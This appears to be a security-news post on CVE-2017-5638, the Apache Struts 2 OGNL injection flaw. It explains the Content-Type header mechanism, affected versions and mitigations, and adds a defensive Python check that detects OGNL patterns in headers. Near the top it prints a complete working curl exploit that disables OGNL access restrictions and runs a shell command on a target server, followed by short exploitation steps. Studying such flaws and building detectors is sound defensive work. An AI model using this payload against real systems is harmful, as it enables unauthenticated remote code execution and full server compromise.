The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malformed Content-Type header is sent in an HTTP request to a Struts endpoint, the framework incorporates the header value into the error message it generates. An attacker embeds an Object-Graph Navigation Language (OGNL) expression within this header. Because the value is not validated on this error-handling path, the embedded OGNL expression is evaluated rather than treated as a plain string. OGNL is a powerful expression language integrated with Struts that can access and execute Java code. This unintended evaluation allows an unauthenticated attacker to achieve remote code execution with the privileges of the Struts application server, simply by sending an HTTP request with a malicious Content-Type value; no file upload is required.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: Patch Available
What Undercode Say:
`curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target.com/struts2-endpoint`
How to Exploit:
Craft malicious HTTP request.
Inject OGNL in header.
Trigger parser error.
Execute arbitrary commands.
Protection from this CVE:
Apply vendor patch.
Upgrade Struts version.
Use WAF filtering.
Input validation.
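As an added, defender-side example (not code from the original post or from the Struts project), the following Python check models the "Input validation" and "WAF filtering" items above for the mechanism described at the top of the page: a Content-Type value is accepted only if it parses as an RFC 7231 media type, and OGNL expression openers such as `%{` or `@class@method` are flagged. The request samples are constructed; `example.test` and the request paths are placeholders.

```python
import re

# Positive validation: the shape of an RFC 7231 media type, i.e. type/subtype followed by
# optional ";name=value" parameters (values may be quoted). A Struts OGNL payload such as
# %{(...)} cannot satisfy this grammar because "{" and "(" are not token characters.
_TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
_MEDIA_TYPE_RE = re.compile(
    rf"^{_TOKEN}/{_TOKEN}(\s*;\s*{_TOKEN}=(?:{_TOKEN}|\"[^\"]*\"))*\s*$"
)
# Negative signature for the CVE-2017-5638 payload family: an OGNL expression opener
# (%{ or ${) or OGNL static-member syntax (@fully.qualified.Class@member) in the header.
_OGNL_RE = re.compile(r"[%$]\{|@[\w.]+@")


def classify_content_type(value: str) -> str:
    """Return 'ok', 'ognl-injection' or 'malformed' for one Content-Type header value."""
    if _OGNL_RE.search(value):
        return "ognl-injection"
    if _MEDIA_TYPE_RE.match(value):
        return "ok"
    return "malformed"


def scan_requests(raw_requests):
    """Return (request_line, verdict) for each raw HTTP request head; only Content-Type is inspected."""
    results = []
    for raw in raw_requests:
        lines = raw.split("\r\n")
        ctype = None
        for line in lines[1:]:
            name, sep, val = line.partition(":")
            if sep and name.strip().lower() == "content-type":
                ctype = val.strip()
                break
        verdict = classify_content_type(ctype) if ctype is not None else "no-content-type"
        results.append((lines[0], verdict))
    return results


# Constructed sample request heads (not captured traffic); the second carries an OGNL opener
# in Content-Type, the shape of the CVE-2017-5638 trigger, without any executable payload.
SAMPLE_REQUESTS = [
    "POST /upload.action HTTP/1.1\r\nHost: example.test\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1\r\n\r\n",
    "POST /upload.action HTTP/1.1\r\nHost: example.test\r\n"
    "Content-Type: %{(#_='multipart/form-data')}\r\n\r\n",
    "GET /index.action HTTP/1.1\r\nHost: example.test\r\n\r\n",
]

if __name__ == "__main__":
    for req_line, verdict in scan_requests(SAMPLE_REQUESTS):
        print(f"{verdict:16} {req_line}")
```

Blocking on the positive grammar rather than on the `%{` signature alone also stops variants that avoid the obvious opener, at the cost of rejecting a few non-conforming but benign clients.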
Impact:
Full system compromise.
Data theft.
Service disruption.
Arbitrary code execution.
Sources:
Reported By: nvd.nist.gov

